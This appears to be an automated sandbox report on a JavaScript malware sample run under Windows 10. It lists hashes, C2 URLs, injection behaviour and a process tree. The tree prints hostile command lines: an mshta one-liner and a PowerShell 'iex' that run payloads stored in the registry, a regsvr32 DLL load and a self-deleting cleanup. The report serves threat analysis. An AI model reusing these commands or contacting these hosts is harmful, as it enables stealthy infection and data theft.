Analysis
-
max time kernel
150s -
max time network
112s -
platform
windows10_x64 -
resource
win10v200410 -
submitted
17-04-2020 22:23
Static task
static1
Behavioral task
behavioral1
Sample
job_attach_h6x.js
Resource
win7v200410
windows7_x64
0 signatures
0 seconds
General
-
Target
job_attach_h6x.js
-
Size
1.3MB
-
MD5
c9a6a820f7d344bfd42471b9964049a8
-
SHA1
bdc1669dec4e00d2d76817379b7b5088fadb471b
-
SHA256
385f77e0604e9926408a261fb3e56268f60e0fda4f124f2d1b0c1b45d106bdc0
-
SHA512
8b5d2d1ad55b942a5158036530c7c92cdb7318b4e878ff4d3e31d891b5b4a874914860c708d056b0033872cff006ce542ebdd79d04d13249e9c63c7f2622fa8f
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 3304 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 1776 powershell.exe Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE Token: SeShutdownPrivilege 3004 Explorer.EXE Token: SeCreatePagefilePrivilege 3004 Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 1776 powershell.exe 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 1492 cmd.exe 3004 Explorer.EXE 3004 Explorer.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 2100 PING.EXE -
Makes http(s) request 14 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 9 http://f1.pipen.at/api1/7GADvelaQdBbcG3cbgNJ/6PTVYPIzuoy2_2Fo7Vs/Z7Ftbay9t5_2FrgAwVuB07/ndO3mq_2Bb4bq/d3OqtCkH/Sc8eiDnGQAevMRCWB6L9HZz/MYQAssSNqn/ECQuVHuPYw5wDz7Mh/cWjlKyW60knY/zLJxzs_2Bgf/fqMhC7655CM_2F/oXAJMbyHgHEgAt3lxzK42/Hy1kHZTXr_2BAlM0/E68oT1_2FvoJpSs/RrSoKWtqa5cWhCcPmC/c7NBZD5VJ/fLebuDJPAgNO7AhYoq_0/A_0Dgctzv5dzstE2o9T/ArSgFesZKZLkgPOdWbrLbF/5MvCthq87r3xv/VAsSgiDzqAX1/IN_2Btqi HTTP URL 7 http://f1.pipen.at/favicon.ico HTTP URL 18 http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP URL 14 https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlist.xml HTTP URL 36 http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/pinrulesstl.cab?68e7dc638e6ec9f3 HTTP URL 28 http://vv.malorun.at/api1/KulXPZBhPRI9AZpt0KVnSY/EmUH0xBPcRseT/CVKrnRad/BtAmyswQafP1ETIiT2jGBvC/NaH6_2BlvK/mTndwDfwLg_2BNY41/KcH9yCOCJked/vsuY8RrWnUs/lKuTpejJvqFqps/VnTOqyd8rzcl8DKJXkHsX/8NEntAZ_2BV0Eaw_/2FaokEL_2FC7PWk/iw9mQPnlfZnfpGajNg/7sLeiY59B/Qpx7Tz4gmpgSTGudpIJB/JUPG7pajyhtjRI_2F31/qkQY8rM2_2BZYflWfA_0A_/0DZX_2F9WLLP5/_2Ft_2Fe/v1npgVweaKpPMVH4DtZXwTy/jyW5YGk6h/lY HTTP URL 29 http://vv.malorun.at/api1/aJmNvxexK8IcNZYPpXr5j/pJNl6hXCqIDwZZzZ/1IQgI0SgF41C4VT/HZq9m7HnCjVdpPQZ0L/8G41RVsEw/x29Zk2pOUfHxMKHrMQb5/m97IEnNikOkgzRgrIAF/aGzIp6PhKyqole3CCWrg07/Nqi5nQsliTpoR/iiWAbanz/J93rS58IPIpV68LlM8jmkzK/CuTU_2F6k1/ra7bIQj7mX4oYjz57/wcRIiP45bG0n/0REmhXN_2BA/_2Be0iRAbNriP3/RJwBEDY7C8_0A_0DrMC5J/XSw9Zf1alyfreMcN/lZUtyv9vfNrAFEV/BQ_2B54t5I/8tF HTTP URL 19 https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlist.xml HTTP URL 30 http://vv.malorun.at/api1/DtVa0JKDu7t7/rCn5O7WB_2B/l1PNE6VLBJRB5A/_2B41iJuLJsHB2_2F3QlE/16kjdUDk7ZySfLu4/_2FdA7NveiaApfr/EGZhanFAxZ5SIDh3Mk/q_2FscHo_/2BLQy8TGbImkT9e_2Bdu/QwRSMyc_2FGjEG4QWem/xMOaXcmDH5et3e6KvST7sD/Y5q2ylkfIsJTw/zeUUs87p/UIIvO1xtKV814WLu4h0MIkC/kUzidBd_2B/rbnsfgDDbl5AwaSQl/DCPmqQAYQu1B/YZqiEYW3St_/0A_0Diy9Ik2Jbq/ounq_2FunUs7VsDRXlsiw/AL2DaLK_2BpYccIIdD/GXV HTTP URL 16 http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?5c7c3d4323d2c5b0 HTTP URL 5 http://f1.pipen.at/api1/NzPZt7xlYBIGaMAgWr0LnK1/mCqKX5N7nd/WLnFw0YpeIkJ47ism/_2Fd5tx3oUnx/8mxM0_2FWpZ/10j4aoqtfdVHr1/1SOvz5YDPOHV9bmC_2BtZ/ExG4KkAcAfV2LpU3/oV34RFUxCvYgfUO/MnCa_2FNsWNqv0P1IF/EMt6RqnGP/2H5euJw1BG9xXAOeCRE1/JSZ2A_2BonghZKRscJs/Mt4wn_2BV_2B43a2UsRPVa/eWTQ_2FSvnSKH/0kCeYlbp/HeDHRuVhbK53BXDLqrPO_0A/_0DyXN6e4N/vldvH5S6U0cy4H3UC/c9fx1gwkP4M6/fvYKKfVajXz/gli9vtRJjQMIZBJFok/kVp HTTP URL 8 http://f1.pipen.at/favicon.ico HTTP URL 6 http://f1.pipen.at/api1/AlPStzn1F/pMrvuw9ZsvHIKCK8Biz9/1HZ6ZQamdd9mtGrSZkJ/tXEEJ4tFgK3XSFVBWef2TF/7MiKiIqv1b9Jr/mf8C9OFs/geqoMAmm1rwgUhkwm_2BaQk/qOYAC6Lv6k/4r3AcbOLkOUL8IqEK/R5Bb8gdeZyHj/1_2BSQF1HVM/TSwv7oBqoZ_2FT/m3WlCJSX9_2BQeP9KeINi/OToUYF9PiLh1xXI_/2FWdiNnx5QixvCs/2FcIsb_2FIA0a5Om9F/cR9LSMuWm/7WMUc2V_0A_0DFT6rcV6/Xb7h3j0nWlUPRZdhc0N/a3RaWTEX7ZV8wpcXYPFg7Q/8hej4uURpKV47cnp5/VU1 HTTP URL 12 http://api10.dianer.at/jvassets/xI/t64.dat -
Suspicious use of WriteProcessMemory 54 IoCs
Processes:
wscript.exeregsvr32.exeiexplore.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 3328 wrote to memory of 3880 3328 wscript.exe regsvr32.exe PID 3328 wrote to memory of 3880 3328 wscript.exe regsvr32.exe PID 3880 wrote to memory of 3304 3880 regsvr32.exe regsvr32.exe PID 3880 wrote to memory of 3304 3880 regsvr32.exe regsvr32.exe PID 3880 wrote to memory of 3304 3880 regsvr32.exe regsvr32.exe PID 4008 wrote to memory of 3316 4008 iexplore.exe IEXPLORE.EXE PID 4008 wrote to memory of 3316 4008 iexplore.exe IEXPLORE.EXE PID 4008 wrote to memory of 3316 4008 iexplore.exe IEXPLORE.EXE PID 4008 wrote to memory of 3572 4008 iexplore.exe IEXPLORE.EXE PID 4008 wrote to memory of 3572 4008 iexplore.exe IEXPLORE.EXE PID 4008 wrote to memory of 3572 4008 iexplore.exe IEXPLORE.EXE PID 3836 wrote to memory of 1776 3836 mshta.exe powershell.exe PID 3836 wrote to memory of 1776 3836 mshta.exe powershell.exe PID 1776 wrote to memory of 860 1776 powershell.exe csc.exe PID 1776 wrote to memory of 860 1776 powershell.exe csc.exe PID 860 wrote to memory of 1004 860 csc.exe cvtres.exe PID 860 wrote to memory of 1004 860 csc.exe cvtres.exe PID 1776 wrote to memory of 1032 1776 powershell.exe csc.exe PID 1776 wrote to memory of 1032 1776 powershell.exe csc.exe PID 1032 wrote to memory of 1248 1032 csc.exe cvtres.exe PID 1032 wrote to memory of 1248 1032 csc.exe cvtres.exe PID 1776 wrote to memory of 3004 1776 powershell.exe Explorer.EXE PID 1776 wrote to memory of 3004 1776 powershell.exe Explorer.EXE PID 1776 wrote to memory of 3004 1776 powershell.exe Explorer.EXE PID 3004 wrote to memory of 3488 3004 Explorer.EXE RuntimeBroker.exe PID 3004 wrote to memory of 1492 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 1492 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 1492 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 3488 3004 Explorer.EXE RuntimeBroker.exe PID 3004 wrote to memory of 3488 3004 Explorer.EXE RuntimeBroker.exe PID 3004 wrote to memory of 4008 3004 Explorer.EXE iexplore.exe PID 3004 wrote to memory of 1492 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 1492 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 4008 3004 Explorer.EXE iexplore.exe PID 3004 wrote to memory of 4008 3004 Explorer.EXE iexplore.exe PID 1492 wrote to memory of 2100 1492 cmd.exe PING.EXE PID 3004 wrote to memory of 2836 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 2836 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 2820 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 2820 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 3556 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 3556 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 3608 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 3608 3004 Explorer.EXE cmd.exe PID 3004 wrote to memory of 1924 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 1924 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 1924 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 1924 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 1924 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 4016 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 4016 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 4016 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 4016 3004 Explorer.EXE WinMail.exe PID 3004 wrote to memory of 4016 3004 Explorer.EXE WinMail.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
iexplore.exepid process 4008 iexplore.exe 4008 iexplore.exe 4008 iexplore.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 1776 set thread context of 3004 1776 powershell.exe Explorer.EXE PID 3004 set thread context of 3488 3004 Explorer.EXE RuntimeBroker.exe PID 3004 set thread context of 1492 3004 Explorer.EXE cmd.exe PID 3004 set thread context of 4008 3004 Explorer.EXE iexplore.exe PID 1492 set thread context of 2100 1492 cmd.exe PING.EXE PID 3004 set thread context of 1924 3004 Explorer.EXE WinMail.exe PID 3004 set thread context of 4016 3004 Explorer.EXE WinMail.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks whether UAC is enabled 3 IoCs
Processes:
IEXPLORE.EXEIEXPLORE.EXEiexplore.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA iexplore.exe -
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3193963248" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e015e5b11715d601 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5800000000000000de04000065020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3224119161" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E9A303E1-810A-11EA-8133-7E6CB608EB13} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006277417e0e384844bb6ae3857779503200000000020000000000106600000001000020000000f0ed12ed9076570408c256bfb1433c0335287970bebe0b68e5e442089099d1a2000000000e8000000002000020000000068e0308c5f3caee4f529656b105e594b866de467b1ffc1e1f2774a988e75f0b20000000b84a61972d301d55e6c56fd1ed8ca92c321d3f6754bd8ef97fab02fe1e77662240000000105434f343f78cb6ad7d9a546be353241304db01a0c048c2b16f4aafaf7a9ea57d54284163a416048d6010f95568eea8e7eeaff37718f4246fa29f5759e70028 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 804fd8b21715d601 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3193963248" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006277417e0e384844bb6ae385777950320000000002000000000010660000000100002000000083bc407a013c578fd215cd3888c53a8df09b66011ad00050d646a9adfa1e0c98000000000e8000000002000020000000fc783272e09eb3c647c9d5c4022ee9a51c25fd4a20b28c09e9810dc82dbcd31e20000000ea5f54eccbb1bdc7cee0e861acc07f96b532276e5cf6f6fb2e59c89cf59ab95c400000008568e7f071682668e7233f0b7f073ee2ffc45255db9d2adf50da81a21b6b29caebcbfba17b91daf157d5c38ef1da15599f7a3292852ffb2e0b2a48bc11c2cba5 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30807319" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30807319" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30807319" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2136578390-2771164089-400866267-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
iexplore.exeIEXPLORE.EXEIEXPLORE.EXEpid process 4008 iexplore.exe 4008 iexplore.exe 3316 IEXPLORE.EXE 3316 IEXPLORE.EXE 4008 iexplore.exe 4008 iexplore.exe 3572 IEXPLORE.EXE 3572 IEXPLORE.EXE 4008 iexplore.exe 4008 iexplore.exe 3316 IEXPLORE.EXE 3316 IEXPLORE.EXE -
Suspicious behavior: EnumeratesProcesses 1259 IoCs
Processes:
powershell.exeExplorer.EXEpid process 1776 powershell.exe 1776 powershell.exe 1776 powershell.exe 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE 3004 Explorer.EXE -
Runs ping.exe 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3004 -
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\job_attach_h6x.js2⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\System32\regsvr32.exe"C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\DeNSXQbUgM.txt3⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\regsvr32.exeC:\Users\Admin\AppData\Local\Temp\\DeNSXQbUgM.txt4⤵
- Loads dropped DLL
PID:3304
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\786D016B-7752-6A8D-C12C-9B3E8520FF52\\Apdsprov'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\786D016B-7752-6A8D-C12C-9B3E8520FF52").Assioker))3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1776 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pfnir1g1\pfnir1g1.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:860 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA3FB.tmp" "c:\Users\Admin\AppData\Local\Temp\pfnir1g1\CSCE0BA480496764639A1B88C2E1BD35991.TMP"5⤵PID:1004
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0wty5kk1\0wty5kk1.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5E0.tmp" "c:\Users\Admin\AppData\Local\Temp\0wty5kk1\CSCEC611F6845DA41ED958C798A60768BC3.TMP"5⤵PID:1248
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\DeNSXQbUgM.txt"2⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
PID:1492 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Runs ping.exe
PID:2100
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\BEA8.bi1"2⤵PID:2836
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:3648
-
-
-
C:\Windows\system32\cmd.execmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\BEC4.bi1"2⤵PID:2820
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵PID:3668
-
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BEA8.bi1"2⤵PID:3556
-
-
C:\Windows\system32\cmd.execmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\BEC4.bi1"2⤵PID:3608
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:1924
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:4016
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3488
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4008 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4008 CREDAT:82945 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3316
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4008 CREDAT:82950 /prefetch:22⤵
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3572
-